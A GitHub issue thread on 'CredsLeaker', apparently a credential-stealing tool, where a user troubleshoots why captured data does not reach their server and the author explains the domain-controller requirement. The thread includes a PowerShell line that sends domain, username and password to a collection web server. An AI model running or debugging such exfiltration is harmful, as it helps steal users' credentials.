### ISSUE TITLE
It does not work for me

### ISSUE THREAD

**Issue by Camilo517** [Dviros/CredsLeaker#1]
Hello, thanks for your script, I configured it, I was testing it but the data did not arrive

If I execute this, if I see that the data arrives to my web server

   Invoke-WebRequest http://192.168.1.33:80/$CurrentDomain";"$username";"$password -Method Get
   $password="hola"
   $username="test"
   $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName

But when executing the bat, the data is simply not shown in the log (I have the ip and port well configured)
Thanks

**Comment by Dviros** [comment]
Hey @Camilo517, Thanks!
As part of the credentials checks, the script tries to communicate with the DC and create an LDAP object.
You didn't supply a value for the $CurrentDomain_Name variable.
Also, executing this script on a WORKGROUP machine was not tested and may not perform well.
Do you have a Domain environment which you can simulate it?
Thanks again and waiting for an update :)

**Comment by Camilo517** [comment]
I understand, you should run the script in an active directory, I'll try, thanks :)

**Comment by Dviros** [comment]
Hey @Camilo517 , I've added WORKGROUP support.
